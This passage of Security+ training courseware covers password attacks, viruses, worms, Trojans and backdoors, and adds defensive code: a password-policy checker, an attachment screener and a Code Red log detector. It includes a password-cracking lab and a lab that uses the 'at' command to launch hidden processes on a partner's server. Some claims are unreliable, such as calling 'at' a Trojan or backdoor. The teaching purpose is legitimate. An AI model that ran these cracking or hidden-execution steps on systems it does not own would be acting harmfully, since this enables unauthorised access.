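    classes = (string.ascii_uppercase, string.ascii_lowercase, string.digits, string.punctuation)
    return len(password) >= 8 and all(any(c in cls for c in password) for cls in classes)


def normalise(password: str) -> str:
    """Strip a trailing digit/punctuation suffix, lowercase, and undo leet substitutions.
    Heuristic: trailing digits that belong to the word itself are stripped too."""
    core = password.rstrip(string.digits + string.punctuation).lower()
    return "".join(UNSUBSTITUTE.get(c, c) for c in core)


def is_dictionary_derived(password: str, wordlist: Iterable[str]) -> bool:
    return normalise(password) in set(wordlist)


def is_acceptable(password: str, wordlist: Iterable[str] = WORDLIST) -> bool:
    """Policy check at password-change time: meeting the complexity rule is not enough."""
    return meets_complexity(password) and not is_dictionary_derived(password, wordlist)


# Constructed account store: {user: hash}. Only dave's password is not word-list derived.
SAMPLE_ACCOUNTS = {
    "alice": hash_password("p@55w0rd"),     # the text's example of a bad choice
    "bob": hash_password("Summer2003"),     # dictionary word plus a year
    "carol": hash_password("Dragon!"),      # capitalised word plus punctuation
    "dave": hash_password("qX7#mL2v!pZ9"),  # meets the rule and is not derivable
}

if __name__ == "__main__":
    for user, recovered in audit(SAMPLE_ACCOUNTS, WORDLIST).items():
        print(f"{user}: recovered {recovered!r}")
    for pw in ("P@55w0rd!", "qX7#mL2v!pZ9"):
        print(f"{pw!r}: complexity={meets_complexity(pw)} acceptable={is_acceptable(pw)}")
```

Note that "P@55w0rd!" satisfies the complexity rule yet is rejected, because the check normalises it back to "password" before consulting the word list.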

Do it!                         G-1:   Decrypting encrypted passwords
                                Here’s how                         Here’s why
(Instructor note: see the classroom setup instructions for the location of the download file.)
                                1 Download the LC4 software to     (Follow the Instructor’s directions.) LC4 is the
                                  C:\Security                      premier password-cracking tool.

                                                                   The download for LC4 is provided at
                                                                   net-security.org/software.php?id=17.

                                2 Install the program              (Follow the Instructor’s directions.)

                                3 Click Start and choose All       To open the LC4 Trial Version window.
                                  Programs, LC4, LC4

                                4 Click Trial                      To open the LC4 Wizard.

                                  Click Next                       To choose the program settings.

                                5 In the Get Encrypted Passwords
                                  window, verify that Retrieve
                                  from the local machine is
                                  selected

                                  Click Next

                                6 In the Choose Auditing Method    LC4 has the capability of doing a brute force
                                  window, select Strong            attack on passwords, which will find all
                                  Password Audit                   passwords given enough time. The trial version,
                                                                   however, does not do the brute force attack, so it
                                                                   finds only the most vulnerable passwords.

                                  Click Next

                                7 In the Pick Reporting Style
                                  window, select all options

                                  Click Next

                                  Click Finish                     To begin auditing. LC4 will successfully decode
                                                                   the simpler passwords on your system.

                                8 Close the LC4 program window

Do it!              G-2:      Discussing attacks against encrypted data
                      Questions and answers
                       1 Weak keys are secret keys used in encryption that exhibit a poor level of
                         encryption. True or false?

                          True

                       2 The brute force approach to password guessing generates every possible
                         combination of keystrokes that could be included in a password. True or false?

                          True

                       3 What type of attack will use properties of the cryptographic algorithm to discover
                         its secret keys?
                          A      Birthday attack
                          B      Mathematical attack
                          C      Password guessing
                          D      All of the above

                       4 How does the dictionary attack succeed in cracking a password?

                          It resolves the hash for each word in its list of English words, and then compares the hash
                          against the user’s password hash. When the two match, the password is cracked.


Topic H: Software exploitation
                         This topic covers the following CompTIA Security+ exam objectives:

                          #     Objective

                          1.3   Identify non-essential services and protocols and know what actions to take to reduce the risks of
                                those services and protocols

                          1.4   Recognize the following attacks and specify the appropriate actions to take to mitigate
                                vulnerability and risk
                                 • Back Door
                                 • Software Exploitation

                          1.5   Recognize the following types of malicious code and specify the appropriate actions to take to
                                mitigate vulnerability and risk
                                 • Viruses
                                 • Trojan Horses
                                 • Logic Bombs
                                 • Worms

                          2.5   Recognize and understand the administration of the following file transfer protocols and concepts
                                 • Vulnerabilities
                                     • 8.3 Naming Conventions




                         Vulnerabilities in software
Explanation              The term exploit is often used to mean any type of attack on a computer system, but
                         software exploitation in the true sense means a penetration of security through
                         vulnerabilities in software. This term casts a wide net, but generally applies to all tools
                         and tricks that take advantage of vulnerabilities in software, whether logic errors or
                         buffer overflows.
                         The majority of successful attacks that use software exploits take advantage of well-
                         known vulnerabilities: ones that are publicly known and for which patches and fixes
                         are readily available from their vendors, usually by download over the Internet.
(Instructor note: ask students how well-known vulnerabilities remain a problem if a fix is developed.)
                         An excellent example of this is the wave of worms that exploited Microsoft’s IIS Server
                         in the summer of 2001. Code Red, Nimda, and Code Red II used, and continue to
                         successfully use, vulnerabilities that have received national press and for which fixes
                         have been available for some time now. These worms have severely impacted the
                         Internet by congesting links with attack traffic and crashing Internet routers, and the
                         worms have severely impacted the businesses that have been hit by them. This points to
                         a continued pattern of indifference to security issues on the part of system
                         administrators, according to a study by Gartner Research in May of 2002.

                  As software is tested by industry experts to assess its level of security and
                  vulnerabilities are identified, the vendor is notified and given time to address the issue
                  before the public is made aware. In this way, users of the product are given an
                  opportunity to protect their systems with vendor-provided fixes and patches before
                  attack tools are generated that can be operated by those with script kiddie-level skills.

                  Buffer overflows
                  Buffer overflows are a very common type of vulnerability and are frequently exploited on
                  the Internet to gain access to systems. This type of attack works in the following
                  manner.
                  Whenever software accepts any type of data from a user or another application, it
                  allocates memory for that data. If the data that is passed to the software is too large to fit
                  into the allocated memory (the buffer), the data could overwrite areas of memory
                  reserved for other processes, including the stack. What results is a buffer overflow,
                  which can have a variety of consequences including application crashes, operating
                  system crashes, or no effect at all—or it could result in a situation in which the attacker
                  can cause his own code to be executed on the system. In this case, the attacker’s buffer
                  overflow could give the attacker access to the system.

                  Countermeasures
                  The key to stopping software exploits against your critical systems is to stay apprised of
                  the latest security patches provided by your software vendors. Most vendors provide
                  mailing lists for this purpose, so customers can be immediately aware of security issues
                  associated with their products, as well as the fixes for those problems. Most security
                  patches are readily available free of charge.
                  Microsoft provides a number of free tools and services to Windows users in order for
                  users of their products to stay abreast of the frequent security updates for their product.
                  Perhaps the most accessible method, found at windowsupdate.microsoft.com, is
                  an automated tool that can examine a Windows machine and identify the latest security
                  and product updates needed for that particular machine. Other tools include the
                  Microsoft Baseline Security Analyzer (MBSA) that identifies critical patches that have
                  not been installed on Windows servers.
                  For more information, go to www.microsoft.com/security.

                  Malicious software
                  Malicious software, or malware, is a catchall term for programs such as viruses, worms,
                  Trojan horses, and backdoor programs that either have negative behaviors or are used
                  by attackers to further their goals. The primary difference between the various types of
                  malware is their means of spreading. The following table outlines the primary
                  differences between worms, viruses, and Trojan horses; more precise explanations are
                  given in each of the following sections:

 Type           Propagation                                       Examples

 Virus          Copies itself into other executable programs      Melissa
                and scripts.

 Worm           Exploits vulnerabilities with the intent of       Code Red
                propagating itself.

 Trojan horse   Uses social engineering techniques to trick       ILOVEYOU, Naked
                users into running the malware’s executable.      Wife, Anna Kournikova



Viruses
Viruses are self-replicating programs that spread by “infecting” other programs. Viruses
copy themselves into other programs and change them (or their environments) so that,
when the infected program is run, the virus is also executed and has the opportunity to
spread the infection to other programs.
The host program or executable can be any binary file, script, or code that has the
opportunity to modify other programs. A virus can infect an executable binary, a Visual
Basic script embedded in a text document or spreadsheet, or a script for IRC (Internet
Relay Chat) clients such as Pirch or mIRC.
It’s important to remember that programs do not have to actually modify an executable
itself to be categorized as viruses. Self-replicating programs that modify the behavior of
the host program or its environment are also clearly viruses. For example, a virus might
cause an e-mail client to mail a copy of the virus to every user in the client’s address
book without actually modifying the e-mail client’s code.

Types of viruses
The number, variety, and frequency of new viruses are astounding. A visit to one of the
many online virus databases reveals new viruses being discovered on a daily basis. The
following table provides just a sampling of virus databases:

 Product                         URL

 Network Associates (McAfee)     http://vil.nai.com/VIL/default.asp

 Symantec                        http://securityresponse.symantec.com/avcenter/vinfodb.html

 Computer Associates             www3.ca.com/virus/encyclopedia.asp

 Trend Micro                     www.antivirus.com/vinfo/virusencyclo/

                  The viruses can be categorized according to type. The following table lists the
                  predominant virus types:

                   Type                  Description

                   Boot sector           Spread by infecting floppy or hard disk boot sectors; when an infected
                                         disk is booted, the virus is loaded into memory and attempts to infect the
                                         hard disk and all floppy disks inserted into the computer.

                   File infector         A class called “parasitic viruses” because they must infect other programs;
                                         file infectors copy themselves into other programs. When an infected file
                                         is executed, the virus is loaded into memory and tries to infect other
                                         executables. File types commonly infected include:
                                         *.exe, *.drv, *.dll, *.bin, *.ovl, *.sys, *.com.

                   Multipartite          Propagated by using both boot sector and file infector methods.

                   Macro viruses         Currently accounting for the vast majority of viruses, macro viruses are
                                         application specific as opposed to OS specific and propagate very rapidly
                                         via e-mail. Many macro viruses are Visual Basic scripts that exploit
                                         commonly used Microsoft applications such as Word, Excel, and Outlook.

                   Companion             Instead of modifying an existing program, the companion virus uses the
                                         DOS 8.3 naming system to disguise itself as a program with the same
                                         name but different extension. For example, a virus might name itself
                                         solitaire.com to emulate the solitaire.exe program. The .com file executes
                                         before an .exe file of the same name. The virus then runs the real program
                                         so it appears as if everything is normal.

                   Polymorphic           Changes or mutates as it copies itself to other files or programs. The goal
                                         is to make it difficult to detect and remove the virus.

                   Metamorphic           Similar to polymorphic, but recompiles itself into a new form, so the code
                                         keeps changing from generation to generation.



                  Propagation techniques
                  Antivirus software and online scanning services have become more commonplace, so
                  viruses must spread quickly if they are to spread at all. To accomplish this, viruses
                  combine mass mailing techniques (sending copies of the virus to all recipients in the
                  infected host’s address book) with file infectors and worm techniques. Mass mailing
                  techniques allow each instance of the virus to infect potentially hundreds of hosts.
                  The following table outlines some of the methods that virus writers are using to spread
                  their viruses:

 Item             Info                  Description

 SKA              January 1999          Single mailer.

 Melissa          March 1999            Mass mailer targeting 50 recipients in a single
                                        activation.

 Babylonia        December 1999         Mass mailer using plug-in techniques.

 LoveLetter       May 2000              Mass mailer targeting all recipients in the victim’s
                                        address book, in multiple activations.

 MTX              August 2000           Mass mailer incorporating file infector, sharing
                                        network, and backdoor features.

 Nimda            September 2001        Mass mailer, also incorporating file infector, sharing
                                        network, backdoor process, and IIS infector methods.

 Sobig            January 2003          Spread through a built-in SMTP client and local
                                        Windows network shares.

 Jitux.A          December 2003         Spread through MSN Messenger.


The major trend in viruses is that virus writers are adapting to more fully exploit the
Internet’s functionality. Boot sector viruses, previously the most prevalent virus type,
have been supplanted by worms and macro viruses that take advantage of the
increasingly interconnected computing environments. Instead of slowly infecting
machines as floppy disks are swapped and shared, viruses can now spread virulently
enough to have a global impact in a matter of days or weeks via the Internet.

Costs
Viruses are incredibly damaging and costly. Some viruses carry a payload that is designed to
erase files, format disks, or exhibit other undesired symptoms. Even viruses that do not have
these qualities have extremely negative consequences. This is because viruses typically have
consequences unintended by the virus writer. For obvious reasons, virus writers do not
perform compatibility testing. When the virus spreads into systems with differing software
packages or OS flavors, it can have unforeseen impacts which can range from slow system
response times to causing the infected system to crash.
When a virus becomes widespread, it causes very large productivity losses in businesses
around the world as computer users struggle with their infected machines. Widespread
infections can also result in what is effectively a denial-of-service (DoS) attack on mail
servers, which can be brought to a grinding halt as they are swamped with a huge volume of
virus-generated messages.
Additional costs are incurred as system administrators have to spend time battling the
infection and removing it from computers. Virus removal can often be a difficult and
time-consuming process. The cleanup process itself can inadvertently cause additional
damage to the computer system because administrators often have to replace important
system files that are infected by the virus. Businesses can incur a significant cost in
terms of goodwill and reputation if they are infected with a virus.

Countermeasures
A number of vendors provide enterprise virus protection solutions that can effectively
filter known viruses, Trojan horses, and worms. These solutions include desktop
antivirus programs, virus filters for e-mail servers, and network appliances that detect
and remove viruses. Best practices dictate that large organizations need a multi-layered
security approach that defends against malware at every point of entry to the network.
This means that no single solution is enough: virus solutions at network gateways, on
desktops, and on e-mail servers (both internally and in network demilitarized zones)
are needed to best protect the enterprise's productivity and information assets.

Instructor note: Stress the importance of virus database update subscriptions so that new
software does not have to be purchased when an outbreak occurs.

Item                      Description

Antivirus products        Install products from multiple vendors. Some suppliers offer a fix for a
                          given new virus before others, so by using multiple products, your
                          organization can have the fix for new viruses sooner.

                          Keep virus signature databases up to date on both desktop computers
                          and servers. Use automated systems to download and install the
                          latest signatures.

Policies and procedures   Define an organizational policy that clearly states proper use of e-mail
                          and network resources, and ensure that computer users receive
                          training on safe computing habits.

Software updates and      Keep machines, and especially servers, up to date with security patches
patches                   to ensure their systems are not vulnerable to well-known exploits.

User education            Instruct users never to download any file from an unknown source. If a
                          program is double-clicked even once, even for a moment to "check it
                          out," the computer can be infected.

                          Caution users about executable files sent to them even by friends
                          and co-workers. In general, there is little need to send executables
                          via e-mail. Users should always check with the sender before
                          running the executable.

Configure servers         Many e-mail servers can automatically disable forwarding of
                          dangerous file types by e-mail to prevent the spread of viruses and
                          other malware.



Trojan horses
According to legend, the ancient Greeks tricked the Trojans into admitting the Greek
army by offering them a wooden statue of a horse as a gift. Once the Trojans had pulled
the horse behind the city's fortifications, the Greek soldiers who were stowed away
inside were able to gain access and conquer the city of Troy.
Likewise, the makers of Trojan horse programs gain access to their victims' computers
by tricking them into running malware that is presented as something useful or
beneficial. The bait used to induce users to run the Trojan horse can include anything
someone might find interesting: games, pictures, MP3s, screen savers, or pornography
(one famous Trojan was entitled "Naked Wife"). When the unwitting user runs the
program, it can wreak havoc by any number of methods, including:

  • Sending copies of itself to all recipients in the user's address book
  • Deleting or modifying files
  • Installing backdoor/remote control programs

Most Trojan horses install themselves silently; users often don't realize they've been
infected until they receive an e-mail from someone saying that an e-mail they received
from the user was infected with a Trojan. In the meantime, the attacker might have
already collected password files or uploaded additional tools to use the victims'
computers for DDoS attacks.

Propagation techniques
Many viruses are categorized as Trojan horses because they use some sort of social
engineering to induce the victim into running the attacker's program. Because most
modern e-mail clients do not allow programs contained in e-mail messages to execute
automatically, viruses that spread by e-mail cannot multiply without user intervention.
One feature of the Windows operating system that can be used to trick users into
running Trojan horses is the "Hide file extensions for known file types" option. By
default, Microsoft Windows hides file extensions, which can cause files to appear to be
a different file type than they actually are. If file name extensions are hidden, then the
file Reunion.jpg.exe will look like Reunion.jpg. This can trick users into executing
Trojan horses.

Countermeasures
Implement a clear organizational policy regarding e-mail attachments and train users
regarding the policy.
Install antivirus programs on each client and maintain current signature files.
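The double-extension trick described above and the "Configure servers" countermeasure in the earlier table both come down to judging an attachment by its real (last) extension rather than the one a user sees. The following added example, which is not part of the courseware, shows a mail-gateway screening function that does exactly that; the extension lists, the block/allow policy and the sample file names are assumptions constructed for illustration.

```python
"""Mail-gateway attachment screening (added example, not from the courseware).

Flags attachments whose real file type is executable, including the
double-extension disguise (Reunion.jpg.exe) that the Windows "Hide file
extensions for known file types" option turns into an apparent picture.
"""
from __future__ import annotations

from dataclasses import dataclass

# Extensions Windows runs on double-click. Illustrative, not exhaustive;
# a production gateway would use a maintained policy list (assumption).
EXECUTABLE_EXTENSIONS = {
    "exe", "com", "scr", "pif", "bat", "cmd", "vbs", "js", "wsf", "hta",
}

# Extensions a user expects to hold harmless data; used to spot disguises.
BENIGN_LOOKING_EXTENSIONS = {
    "jpg", "jpeg", "gif", "png", "bmp", "txt", "doc", "pdf", "mp3",
}


@dataclass
class Verdict:
    filename: str
    action: str   # "allow" or "block"
    reason: str


def split_extensions(filename: str) -> list[str]:
    """All dot-separated suffixes, lowercased: 'a.jpg.exe' -> ['jpg', 'exe']."""
    parts = filename.strip().lower().split(".")
    return [p for p in parts[1:] if p]


def displayed_name(filename: str) -> str:
    """What Explorer shows when extensions of known file types are hidden."""
    base, dot, _ext = filename.rpartition(".")
    return base if dot else filename


def screen_attachment(filename: str) -> Verdict:
    """Decide whether one attachment may be forwarded to the recipient."""
    exts = split_extensions(filename)
    if not exts:
        return Verdict(filename, "allow", "no extension")
    real_ext = exts[-1]          # the OS acts on the last suffix only
    if real_ext not in EXECUTABLE_EXTENSIONS:
        return Verdict(filename, "allow", f"data file type .{real_ext}")
    # Executable: check whether an inner "harmless" extension disguises it.
    disguises = [e for e in exts[:-1] if e in BENIGN_LOOKING_EXTENSIONS]
    if disguises:
        return Verdict(
            filename, "block",
            f"executable .{real_ext} disguised as .{disguises[-1]} "
            f"(would display as '{displayed_name(filename)}')",
        )
    return Verdict(filename, "block", f"executable file type .{real_ext}")


def screen_message(attachment_names: list[str]) -> list[Verdict]:
    """Screen every attachment of one message; the caller quarantines blocks."""
    return [screen_attachment(name) for name in attachment_names]


if __name__ == "__main__":
    # Constructed sample attachment names.
    for verdict in screen_message(
        ["Reunion.jpg.exe", "holiday.JPG", "setup.exe", "README", "minutes.doc"]
    ):
        print(f"{verdict.action:5}  {verdict.filename:18}  {verdict.reason}")
```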

Do it!   H-1: Discussing viruses and Trojan horses

Questions and answers

1 Describe a macro virus.

  These Visual Basic scripts exploit Microsoft applications.

2 What is a polymorphic virus?

  A  A virus that recompiles itself into a new form from generation to generation.
  B  A virus that changes itself as it copies to other files or programs.
  C  A virus that spreads by infecting the hard boot sector or floppy disks.
  D  A virus that presents itself as a useful or beneficial program in order to trick
     the user into executing it.

3 Describe how a Trojan horse is propagated.

  It usually is attached to an e-mail message. Once run, it can use the user's address book to
  send copies of itself to other marks.

Backdoor
Explanation   A backdoor is a piece of malicious software, or malware, that allows a malevolent user
to gain remote access to a computer without the knowledge or permission of its owner. Also
known as remote access Trojans, these programs allow an attacker to connect to the
compromised computer locally or over the Internet and, depending on the type of backdoor
installed, issue a wide variety of commands. Although some machines compromised with
backdoor programs are used to store files and applications such as hacks and exploits for
later use, they can also be used as handlers in a distributed denial-of-service attack.

Trojan.VirtualRoot
Backdoor programs can be installed on victim machines by any number of methods:
Trojans or other social engineering methods, worms, viruses, or manually by exploiting
vulnerabilities and uploading the remote control software. One recent threat using a
backdoor is the Code Red II worm, which exploits a vulnerability in Microsoft IIS servers
to gain entry, installs remote access software called Trojan.VirtualRoot, and continues to
spread to other machines. This type of attack is typical of the recent trend of blended
threats. Once the Trojan.VirtualRoot backdoor has been installed, the server can be
controlled remotely.

Back Orifice 2000
One of the more famous remote access control/backdoor programs is Back Orifice 2000
(BO2K), mockingly named after Microsoft's BackOffice 2000 product suite. Produced
by a hacker group called Cult of the Dead Cow (www.cultdeadcow.com), BO2K is
offered as a remote administration tool, although its lightweight and unobtrusive nature
allows it to be surreptitiously installed on a victim's computer without his or her
knowledge. After the BO2K server (only 40K) is configured, as shown in Exhibit 3-8,
and installed on the compromised system, it immediately buries itself in the Windows
system directory and runs silently every time the computer is rebooted.

Exhibit 3-8: BO2K configuration screen

A remote attacker can then connect to the compromised machine by using the BO2K
client GUI and issue any number of commands. Plug-ins are available for BO2K that
allow the hacker to view the compromised computer's desktop and move the mouse
pointer. It is even possible for the remote attacker to activate the victim's video camera
and microphone, thereby monitoring everything, and everyone, in front of the computer.
BO2K runs on most Windows systems and is currently being ported to other operating
systems. For more information about the tool, see the following Web site:
    http://sourceforge.net/projects/bo2k/

NetBus
NetBus is an earlier remote control/backdoor tool that has functionality similar to that of
BO2K. Like other such programs, NetBus is often the payload of a Trojan horse or
worm that gives hackers the ability to connect to the compromised machine over the
Internet and issue a variety of commands. Some of the commands seem to be included
in the feature set more for their ability to impress the unassuming victim than to be
useful. A list of NetBus commands is shown in Exhibit 3-9.

Exhibit 3-9: NetBus commands


Countermeasures
Backdoor and remote access programs such as BO2K and NetBus are easily detected
and eliminated by antivirus software and are otherwise thwarted by the same
mechanisms used against Trojan horses and viruses. For this reason, it is important to
implement an effective virus screening solution on all servers and desktop computers, as
well as to educate computer users about the danger of e-mailed viruses and Trojan
horses. In addition to these regimens, critical e-commerce servers should be equipped
with host-based intrusion detection systems to block attacks that result in the installation
of backdoors. Backdoor traffic can also be spotted by network-based intrusion detection
systems, although some backdoors encrypt their traffic to bypass network IDS signature
detection.

Do it!   H-2: Using the AT command to start system processes

Instructor note: For this activity, students will work in pairs. Each partnership will use two
machines, Server-X and Server-Y. Instruct students to substitute their server's hostname for
Server-X and their partner's server hostname for Server-Y.

Here's how                                           Here's why

1 On Server-X, log in as Administrator               The Windows operating system allows you to
                                                     execute a program on a remote system. Using
                                                     the "at" command, you can schedule an
                                                     executable to run on a remote system at a
                                                     specific time. This is a remote access Trojan and
                                                     is commonly used to install Trojan horses on a
                                                     remote system.

2 Press Ctrl+Alt+Delete

  Click Task Manager                                 To open the Windows Task Manager.

  Activate the Processes tab                         To view the current processes. Look for
                                                     notepad.exe. You should not see it.

3 On Server-Y, log in as Administrator

4 Open a command prompt window

5 Enter the following command:                       To learn the current time for Server-X so you
                                                     can schedule the execution of a program.
  net time \\server-x

Instructor note: The value for <time> should be 3 minutes after the current time for Server-X.

6 Enter the following command:                       Where <time> is 3 minutes after the current
                                                     time.
  at \\server-x <time> /interactive "notepad.exe"
                                                     The command at \\server-x 3:49p /interactive
                                                     "notepad.exe", for example, will launch Notepad
                                                     in an interactive window at 3:49 PM on Server-X.

7 Enter the following command:

  at \\server-x <time> "notepad.exe"                 The command at \\server-x 3:49p "notepad.exe",
                                                     for example, will launch Notepad as a background
                                                     process at 3:49 PM on Server-X.

                                                     Omitting the "/interactive" switch launches a
                                                     process that is hidden from your partner.

8 On Server-X, after the time specified
  in the command lapses, check Windows
  Task Manager and view the processes

9 Check the Server-X desktop for the                 You'll see that Notepad is running on the server.
  Notepad application

10 Close Task Manager and Notepad on
   Server-X and the command window on
   Server-Y

Logic bombs
Explanation   Another category of malicious code is known as a logic bomb. A logic bomb is a set of
computer instructions that lies dormant until triggered by a specific event. That event can
be almost anything, such as opening a document, launching a program, pressing a key a
certain number of times, or an action that the computer has taken. Once the logic bomb
is triggered, it performs a malicious task.
Logic bombs might reside within stand-alone programs as Trojan horses, or they might
be part of a computer virus. This makes them almost impossible to detect until after they
are triggered and the damage is done.
Logic bombs are often the work of former employees. One logic bomb caused a
company's computerized accounting system to be corrupted. It was triggered by an
instruction to check the corporate salary database every three months; if the
programmer's name was not found, the logic bomb was instructed to launch.
Another logic bomb was the work of an independent computer consultant hired to write
a program. His intention was to return after the logic bomb was triggered and be paid a
large consulting fee to fix the problem.
On personal computers, a prominent type of logic bomb is known as a macro virus. A
macro virus uses the auto-execution feature of specific application programs, such as
Microsoft Word. Whenever Word is launched, the virus is triggered and performs a
malicious act.

Worms
Starting in mid-2001, worms surpassed DoS attacks as the primary type of malicious
activity on the Internet. The release of the Code Red worm in the summer of 2001,
shortly followed by Code Red II and Nimda, brought about a sea change in the type of
attacks that security administrators need to fend off.
Although the term worm has a few different commonly used meanings, the "classic
worm" or "real worm" is defined as a self-contained program that uses security flaws
such as buffer overflows to remotely compromise a victim and replicate itself to that
system. Unlike viruses, true worms do not infect other executable programs, but instead
install themselves on the victim computer system as a stand-alone entity that does not
require the execution of an infected application.

Melissa
The term e-mail worm has also been used informally to mean a virus that spreads
through external network connections, emphasizing the threat posed by mass-mailing
viruses. The Word97Macro/Melissa worm was perhaps the first well-known e-mail
worm and the most famous virus to date. Melissa gained notoriety in March of 1999 as
the first virus to send mass e-mails of itself by using recipients in a user's address book.

Code Red
Although e-mail worms have become a common and very prevalent threat to networks,
true worms such as Code Red have become even more common, accounting for 80% of
all malicious activity on the Internet and bringing e-commerce networks to a standstill.
Appearing in June of 2001, Code Red exploited a known vulnerability in Microsoft IIS
4.0 and 5.0. The worm operated by creating a random list of IP addresses, which it then
scanned for the IIS vulnerability. If the worm found a target system with the
vulnerability, it executed the buffer overflow exploit, which resulted in the worm's code
being loaded onto and executed by the victim system.

The worm then began to propagate itself from the newly compromised machine. After
two hours, the worm changed the server’s Web page.
The Code Red worm also tried to perform a denial-of-service attack on the IP
address of www.whitehouse.gov, but the threat was averted by simply changing
the domain’s IP address.
Since Code Red did not store itself on any files, the worm could be removed from
infected systems simply by rebooting the machine; however, servers would remain
vulnerable to the attack and could be reinfected with Code Red until system
administrators applied the necessary security patch provided by Microsoft.
Although Code Red was programmed to go dormant shortly after its release, its
successor worms, Code Red II and Nimda, continued to be a real threat to unpatched IIS
servers over a year after their release.

Countermeasures
True worms spread by exploiting known vulnerabilities, so the key defense against these
attacks is for system administrators to ensure that all servers are patched with the latest
security updates. Since Nimda can exploit a vulnerability in Internet Explorer to run an
executable in a Web page or e-mail message without user intervention, system
administrators must also keep abreast of security issues affecting their users' desktop
computers and ensure that the required security patches are installed.
Network- and host-based intrusion detection systems (IDS) are also critical components
in securing a network against remote attacks such as Code Red. A host-based IDS can
detect unauthorized system activity and stop it before the server is infected. A
network-based IDS can detect the signatures of known worms as well as the malicious
activity generated by those worms, notify system administrators, and instruct routers and
firewalls to block traffic from the offending hosts.
To protect against worm attacks that are propagated via e-mail, a comprehensive
antivirus system should be implemented. Make sure users have their e-mail set so it
does not preview a message when selected. Instead, users should have to double-click
the message and only then if they recognize the sender.
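As an added example (not part of the courseware), here is the kind of defender-side detection logic a host- or network-based IDS applies to a true worm such as Code Red: it scans constructed IIS W3C-format log lines for requests to the .ida/.idq ISAPI indexing extensions that carry an abnormally long or unicode-escaped query, and collects the offending source hosts so a firewall block list can be built from them. The 200-character threshold, the sample log lines and the query padding are assumptions constructed for illustration.

```python
"""Log-based detection of Code Red-style IIS .ida probes (added example).

Parses IIS W3C extended log lines (constructed samples below) and flags
requests shaped like the worm's propagation probe: a GET for an ISAPI
indexing resource (.ida/.idq) with an oversized or unicode-escaped query.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Iterator

# Assumed threshold: legitimate Index Server queries are short.
MAX_QUERY_LEN = 200
ISAPI_INDEXING_EXTS = (".ida", ".idq")

# Constructed approximation of the worm's padding (a long run of one
# character followed by %u-escaped bytes); not a real capture.
PROBE_QUERY = "N" * 224 + "%u9090%u6858"

# Constructed sample log in IIS W3C format. Field order comes from the
# #Fields header, which the parser reads instead of assuming positions.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2001-07-19 10:14:02 192.0.2.10 GET /index.htm - 200",
    f"2001-07-19 10:14:05 198.51.100.7 GET /default.ida {PROBE_QUERY} 200",
    "2001-07-19 10:14:09 192.0.2.11 GET /search.idq CiRestriction=printers 200",
    f"2001-07-19 10:14:12 198.51.100.7 GET /default.ida {PROBE_QUERY} 200",
    "2001-07-19 10:14:20 203.0.113.5 GET /default.ida - 404",
])


@dataclass
class Alert:
    timestamp: str
    source_ip: str
    uri: str
    query_len: int
    reason: str


def parse_w3c(text: str) -> Iterator[dict[str, str]]:
    """Yield one dict per record, keyed by the names in the #Fields line."""
    fields: list[str] | None = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue                      # other directive, or no header yet
        values = line.split()
        if len(values) != len(fields):
            continue                      # malformed record: skip, don't crash
        yield dict(zip(fields, values))


def is_ida_overflow_probe(rec: dict[str, str]) -> str | None:
    """Return a reason string if the record looks like an .ida overflow probe."""
    stem = rec.get("cs-uri-stem", "").lower()
    query = rec.get("cs-uri-query", "-")
    if not stem.endswith(ISAPI_INDEXING_EXTS) or query == "-":
        return None
    if len(query) > MAX_QUERY_LEN:
        return "oversized query to ISAPI indexing extension"
    if "%u" in query.lower():
        return "unicode-escaped bytes in query to ISAPI indexing extension"
    return None


def scan_log(text: str) -> list[Alert]:
    """Run the probe check over every record in a W3C log."""
    alerts: list[Alert] = []
    for rec in parse_w3c(text):
        reason = is_ida_overflow_probe(rec)
        if reason:
            alerts.append(Alert(
                timestamp=f"{rec['date']} {rec['time']}",
                source_ip=rec["c-ip"],
                uri=rec["cs-uri-stem"],
                query_len=len(rec["cs-uri-query"]),
                reason=reason,
            ))
    return alerts


def offending_hosts(alerts: list[Alert]) -> list[str]:
    """Unique source IPs in first-seen order, ready for a firewall block list."""
    seen: list[str] = []
    for alert in alerts:
        if alert.source_ip not in seen:
            seen.append(alert.source_ip)
    return seen


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f"{a.timestamp} {a.source_ip} {a.uri} len={a.query_len}: {a.reason}")
    print("block list:", offending_hosts(found))
```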

Do it!   H-3: Understanding software exploitation

Questions and answers

1 What is a buffer overflow?

  A buffer overflow is an attack where the software fills the allocated memory and starts
  overwriting areas of memory reserved for other processes. It results in application crashes,
  operating system crashes, or a situation where the attacker can cause his own code to be
  executed on the system.

2 What is the difference between a virus and a worm?

  A virus is a self-replicating program that spreads by infecting other programs. A worm is a
  self-contained program that uses security flaws to compromise the victim and replicate itself
  to that system.

3 The Windows Server 2003 at command is a backdoor. True or false?

  True: If used to install malicious code on a target system.


Unit summary: Attacks and malicious code
Topic A   In this topic, you learned that denial-of-service (DoS) attacks are a family of attack
          methods that interrupt network services for legitimate users. You learned that a SYN
          flood prevents users from accessing a target server by flooding it with half-open TCP
          connections, and that the Smurf attack overwhelms a host with ICMP packets. You also
          learned about the Ping of Death, which uses IP packet fragmentation techniques to
          crash remote systems, as well as Distributed Denial of Service attacks, which
          manipulate multiple hosts to carry out a DoS attack on a target.
Topic B   In this topic, you learned that man-in-the-middle attacks refer to a class of attacks in
          which the attacker places himself between two communicating hosts and listens in on
          their session. The key to this concept is that both hosts think they are communicating
          with the other when they are in fact communicating with the attacker.
Topic C   In this topic, you learned that spoofing is pretending to be someone else by imitating or
          impersonating that person in order to gain access to a network. There are four primary
          types of spoofing that are issues for the information security professional: IP address
          spoofing, ARP poisoning, Web spoofing, and DNS spoofing.
Topic D   In this topic, you learned about replay attacks, where attackers listen to and repeat
          messages from a legitimate user in order to impersonate the user and gain access to
          systems.
Topic E   In this topic, you learned about TCP session hijacking, where an attacker tries to make
          the victim believe that he or she connected to a trusted host, when in fact the victim is
          communicating with the attacker.
Topic F   In this topic, you learned about social engineering attacks and why they can be so
          effective in obtaining a password or other valuable information from unsuspecting
          victims.
Topic G   In this topic, you learned that malicious software, or malware, is a catchall term for
          programs such as viruses, worms, Trojan horses, and backdoor programs that either
          have negative behaviors or are used by attackers to further their goals.
Topic H   In this topic, you learned about software exploitation. You learned that the primary
          difference between the various types of malware is their means of spreading.

          Review questions
